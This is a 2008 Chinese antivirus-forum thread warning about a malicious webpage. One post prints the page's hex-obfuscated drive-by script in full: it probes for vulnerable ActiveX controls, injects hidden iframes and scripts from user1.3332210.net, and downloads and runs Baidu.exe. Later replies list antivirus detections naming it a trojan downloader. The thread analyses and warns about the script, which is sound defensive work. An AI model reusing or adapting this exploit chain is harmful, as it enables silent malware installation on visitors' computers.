查看: 2200|回复: 9
收起左侧

[已鉴定] 这个网页有毒

 关闭 [复制链接]
lxy360
发表于 2008-2-13 23:05:11 | 显示全部楼层 |阅读模式
醉一生爱妍
发表于 2008-2-13 23:10:04 | 显示全部楼层
技术垃圾的不行..

  1. <script>window.onerror=function(){return true;}</script>
  2. <script>
  3. if(document.cookie.indexOf('OK')==-1){
  4. try{var e;
  5. var ado=(document.createElement("object"));
  6. var Rising="\x63\x6c\x61\x73\x73\x69\x64";
  7. var KV2008="\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d";
  8. var Kaspersky="\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
  9. ado.setAttribute(Rising,Kaspersky);
  10. var as=ado.createobject(KV2008,"")}
  11. catch(e){};
  12. finally{
  13. var expires=new Date();
  14. expires.setTime(expires.getTime()+3*60*60*1000);
  15. document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
  16. if(e!="[object Error]"){
  17. document.write("<script src=http:\/\/user1.3332210.net\/ms06014.js><\/script>")}
  18. else{
  19. try{var f;
  20. var ourgame=new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31");}
  21. catch(f){};
  22. finally{if(f!="[object Error]"){
  23. document.write('<iframe style=display:none src="'">http://user1.3332210.net/GLWORLD.html"></iframe>')}}
  24. try{var g;
  25. var storm=new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72");}
  26. catch(g){};
  27. finally{if(g!="[object Error]"){
  28. document.write('<iframe style=display:none src="'">http://user1.3332210.net/StormII.html"></iframe>')}}
  29. try{var h;
  30. var Real=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6c\x2e\x49\x45\x52\x50\x43\x74\x6c\x2e\x31");}
  31. catch(h){};
  32. finally{if(h!="[object Error]"){
  33. document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.3332210.net\/real.js><\/script>')}}
  34. try{var i;
  35. var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
  36. catch(i){};
  37. finally{if(i!="[object Error]"){
  38. Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.3332210.net/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
  39. if(h=="[object Error]" && g=="[object Error]" && f=="[object Error]" && i=="[object Error]")
  40. {
  41. location.replace("about:blank");}
  42. }}}
  43. </script>
复制代码


http://user1.3332210.net/Baidu.cab

[ 本帖最后由 garyyan456 于 2008-2-13 23:12 编辑 ]
gho
发表于 2008-2-13 23:11:53 | 显示全部楼层
呵呵用FS的飘
leonfg
发表于 2008-2-13 23:15:11 | 显示全部楼层
原帖由 gho 于 2008-2-13 23:11 发表
呵呵用FS的飘

结果: 发现1个恶意软件
Trojan-Downloader.Win32.Agent.ibl (病毒)
  • C:\Documents and Settings\GUNDAM\桌面\Baidu.cab\Baidu.exe
spatra
发表于 2008-2-13 23:17:35 | 显示全部楼层
Firefox3.0 b3都认识它,
未命名.jpg
gho
发表于 2008-2-13 23:23:11 | 显示全部楼层

回复 4楼 leonfg 的帖子

呵呵你也是FS啊我看见没反映就关了
冷冷
发表于 2008-2-13 23:47:27 | 显示全部楼层

回复 2楼 garyyan456 的帖子

怎么弄的
spaceplane
发表于 2008-2-13 23:49:43 | 显示全部楼层
avast报Win32:Agent-RHJ [Trj]
醉一生爱妍
发表于 2008-2-13 23:53:49 | 显示全部楼层

回复 7楼 冷_冷 的帖子

偶都还没解出来呢.....
mofunzone
发表于 2008-2-14 00:08:27 | 显示全部楼层
Virus or unwanted program 'TR/Dldr.Agent.dyd [TR/Dldr.Agent.dyd]'
detected in file 'C:\TDDOWNLOAD\Baidu.cab.td.
Action performed: Delete file
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 19:02 , Processed in 0.149080 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表